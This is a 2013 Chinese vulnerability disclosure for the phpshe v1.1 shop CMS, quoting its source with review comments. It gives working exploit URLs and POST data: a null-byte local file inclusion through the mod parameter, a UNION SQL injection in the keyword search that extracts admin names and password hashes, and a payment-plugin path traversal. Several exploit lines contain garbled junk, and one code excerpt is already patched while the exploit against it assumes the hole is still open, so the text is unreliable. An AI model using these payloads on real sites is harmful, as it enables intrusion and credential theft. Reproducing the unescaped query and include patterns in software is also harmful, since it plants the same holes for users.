
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By     : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
// Request "auto-globals": every key of the request superglobals is turned into a
// prefixed variable via extract(..., EXTR_PREFIX_ALL): $_g_<key> for GET,
// $_p_<key> for POST, $_s_<key> for session, $_c_<key> for cookie.
// Values only pass through pe_trim() (and pe_stripslashes() when magic quotes
// added slashes) — no SQL or path escaping happens here, so $_g_keyword,
// $_g_orderby and $_p_info used further down arrive exactly as the client sent them.
// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0; this branch only
// resolves on PHP 7.x and older.
if (get_magic_quotes_gpc()) {
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies are passed through pe_stripslashes() unconditionally, unlike GET/POST.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

//首页文件
<?php
include('common.php');

// Page-level caches consumed by the shared templates.
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');

// Configured QQ contact list, or an empty list when the setting is blank.
if ($cache_setting['web_qq']['setting_value']) {
    $web_qq = explode(',', $cache_setting['web_qq']['setting_value']);
} else {
    $web_qq = array();
}

// Cart badge: DB row count for a logged-in user, otherwise the size of the cart
// kept in the cookie.
// NOTE(review): $_c_cart_list is raw cookie data handed to unserialize() (PHP object
// injection risk); a JSON-encoded cart read with json_decode() would be the safe form.
if (pe_login('user')) {
    $cart_num = $db->pe_num('cart', array('user_id'=>$_s_user_id));
} elseif (unserialize($_c_cart_list)) {
    $cart_num = count(unserialize($_c_cart_list));
} else {
    $cart_num = 0;
}

// Dispatch to the module file. $mod is taken from the request in common.php with no
// validation, so this include resolves whatever the client supplies (the "chicken-rib"
// inclusion the author points out); it should be checked against the real module
// names before reaching include().
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
//common 文件 第15行开始
url路由配置
// Route resolution: POST wins over GET, each falling back to the default 'index'.
// These raw values later pick the module file that gets include()d, so they are a
// security-relevant input — no character whitelist is applied at this point.
$module = $mod = $act = 'index';
if ($_POST['mod']) {
    $mod = $_POST['mod'];
} else {
    $mod = $_GET['mod'] ? $_GET['mod'] : $mod;
}
if ($_POST['act']) {
    $act = $_POST['act'];
} else {
    $act = $_GET['act'] ? $_GET['act'] : $act;
}
// $id gets no default on the first line above; unless it was set earlier in the
// file, the fallback reads an undefined variable (notice) and leaves $id null.
if ($_POST['id']) {
    $id = $_POST['id'];
} else {
    $id = $_GET['id'] ? $_GET['id'] : $id;
}
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%006 Z0 z6 p! v9 E! v; I


0×02 搜索注入

<code id="code2">

//product.php文件
// 'list' action: builds the WHERE / ORDER BY fragment for the product listing as a
// raw SQL string and hands it to pe_selectall(), which interpolates a string $where
// into the query unchanged (see pe_selectall below).
case 'list':
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // search
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // $category_id is intval()'d above; category_cidarr() presumably returns
        // DB-derived child ids — not request data.
        $sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // SQL injection: $_g_keyword comes straight from the request (common.php extract)
    // and is concatenated without escaping. It must at minimum be escaped for quotes
    // and for the LIKE wildcards % and _ before being placed in the pattern.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; // the keyword variable is not filtered for SQL
    if ($_g_orderby) {
        // Same problem: column suffix and sort direction are client-controlled and
        // interpolated as-is; they should be whitelisted (known product_* columns,
        // 'asc'/'desc') rather than concatenated.
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // $_g_page is also request data; its handling is inside sql_selectall (not shown).
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // best-seller ranking
    $product_hotlist = product_hotlist();
    // breadcrumb path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进selectall函数库
/**
 * Select all rows of a table.
 *
 * $table and $field are spliced into the statement verbatim, and a string $where is
 * passed through _dowhere() and then interpolated as well — so none of them may carry
 * client data unless it was escaped by the caller (product.php's keyword search does
 * not do that).
 *
 * @param string       $table      table name without the dbpre prefix
 * @param array|string $where      condition array, or a raw " and ..." SQL fragment
 * @param string       $field      column list for the select
 * @param array        $limit_page [per_page, page] forwarded to sql_selectall
 * @return mixed whatever sql_selectall returns
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // Normalise the caller-supplied condition into a SQL fragment.
    $condition = $this->_dowhere($where);
    $sql = 'select ' . $field . ' from `' . dbpre . $table . '` ' . $condition;
    return $this->sql_selectall($sql, $limit_page);
}
//exp
1 a; e( O# ~; o, Y$ q0 Hproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

</code>

0×03 包含漏洞2
<code id="code3">

//order.php

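case 'pay':
    // Order id from the request, escaped for the DB layer with the project's pe_dbhold().
    $order_id = pe_dbhold($_g_id);

    // Configured payment methods, keyed by payway code (the 'bank' check below relies
    // on that); each entry carries a serialised config blob.
    $cache_payway = cache::get('payway');
    foreach ($cache_payway as $k => $v) {
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // Flatten line breaks so the bank text can be placed in the template.
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }

    // Only orders that are still unpaid can be paid.
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');

    if (isset($_p_pesubmit)) {
        // Fix: the chosen payway names the plugin directory include()d below, so it must
        // be one of the configured payways. Checked before the order row is touched so
        // an invalid value is neither persisted nor used as a path.
        // (Assumes the payway cache is keyed by the plugin directory name, as the
        // $k == 'bank' comparison above implies — confirm against cache::get('payway').)
        $order_payway = (isset($_p_info['order_payway']) && is_string($_p_info['order_payway']))
            ? $_p_info['order_payway']
            : '';
        if ($order_payway === '' || !isset($cache_payway[$order_payway])) {
            pe_error('支付方式错误...');
        }
        elseif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            // NOTE(review): $_p_info is still written to the order row wholesale, so the
            // client decides which columns are updated; restrict it to order_payway here.
            // Build the display name from the order's line items.
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // $order_payway was validated against the configured payways above.
            include("{$pe['path_root']}include/plugin/payway/{$order_payway}/order_pay.php");
        }
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;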

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
